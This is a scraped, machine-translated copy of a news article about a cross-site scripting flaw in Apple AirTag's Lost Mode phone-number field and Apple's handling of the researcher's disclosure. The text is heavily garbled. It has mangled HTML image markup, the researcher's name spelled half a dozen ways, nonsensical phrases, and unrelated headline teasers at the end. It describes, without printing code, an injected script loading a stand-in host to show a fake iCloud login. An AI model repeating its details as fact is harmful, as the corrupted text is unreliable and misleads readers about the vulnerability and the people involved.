Another potential problem is the general detection of preexisting errors. >
This time, you can use the Good De Jour app to purge the user input field - in particular, the phone number field that AirTag owners use to identify their lost devices,
Good Samaritan Attack h2> < img alt = 'AirTags are small button-like devices that can be customized by embossing and attached directly to devices that are easily lost through 'loop' mounts. "src=" https://safirsoft.com/picsbody/2110/10681-1.jpg "alt=" https://safirsoft.com Apple AirTags can be used to navigate malicious websites "srcset=" https://cdn.arstechnica.net/wp-content / uploads / 2021/09 / GettyImages-1315307821.jpg 2x "> Zoom in / AirTags are small button-like devices that can be customized by embossing and directly or through mounts." The episode' connected to easily lost devices. Getty Images
Security consultant and penetration tester Bobby Rush has discovered that Apple AirTags — small devices that can get lost in frequent items, like Stick to Laptop, Phone, or Car Key — don't purify user input , this monitoring opens the door to Use AirTag in a drip attack Instead of planting a targeted queue with USB drives infested with malware, an attacker can use AirTag to drop off ready-made malware.
This type of attack doesn't require much technical knowledge. - The attacker just type the valid XSS into the AirTag's phone number field, then put the AirTag in Lost and probably put it's purpose.In theory, checking for a lost AirTag is a safe bet - a webpage should only appear at https://found .apple.com/.The problem is that found.apple.com embeds the contents of the phone number section on the website, which is impractical, as shown in the victim's browser.To use simple XSS to open the fake iCloud login dialog on The victim's phone. This is not important in any way nor in terms of code: p>
If found.apple.com innocently included the above XSS in the AirTag scan response, the victim will open a window displaying the contents of badside.tld/page.html. This could be a browser's zero-day process or Just a phishing conversation. Rach assumes a fake iCloud login conversation, which may look like the real thing - but instead targets the victim's credentials on the server.Advertising
While this is a disguised abuse, it's not the only one Available in any way - almost everything you can do with a web page is on the table and available. This includes the simple phishing seen in the example above exposing the victim's phone to a click-browser vulnerability. Because of Rauch's exploit - publicly available.
This public disclosure was provided by Apple
Read more According to a Krebs on Security report, Rauch discloses the vulnerability primarily caused by a connection failure by Apple. The vulnerability was first revealed privately to Apple on June 20, but the only thing the company has been telling him for three The most famous is that they are "still checking". This is a strange answer to what seems to be a very simple bug to check and minimize. Last Thursday, Apple sent Rauch an email saying that an upcoming update would fix the vulnerability and asked him not to speak publicly about it.
Apple has never questioned Roots' basic questions, such as whether there was a timeline for the bug, whether it was due to be validated for reporting, and whether it was eligible for the award. Cupertino's lack of communication has led to Ruffish being public in the media, despite the fact that Apple has asked researchers to remain silent about their findings if they want credit and/or compensation for their work.
Ratch said he wanted to work with Apple, but asked the company to "provide some details about when you decided to fix the problem, and whether there were any errors recognized or rewarding." Show.” He also warned the company that it intended to release her within 90 days. "Basically, we would be very happy if you didn't release this information," Rush said.
Apple AirTags can be exploited to redirect malicious websites
At least since 2019, popular YouTube channels have been tak...
Britain's COVID Pass card system was suspended for hours o...
Several Visible Wireless subscribers reported having their accounts ...
This is the story of the mastermind behind one of the largest "fake news" op...
Twitch's live video streaming service has been hacked and 125GB...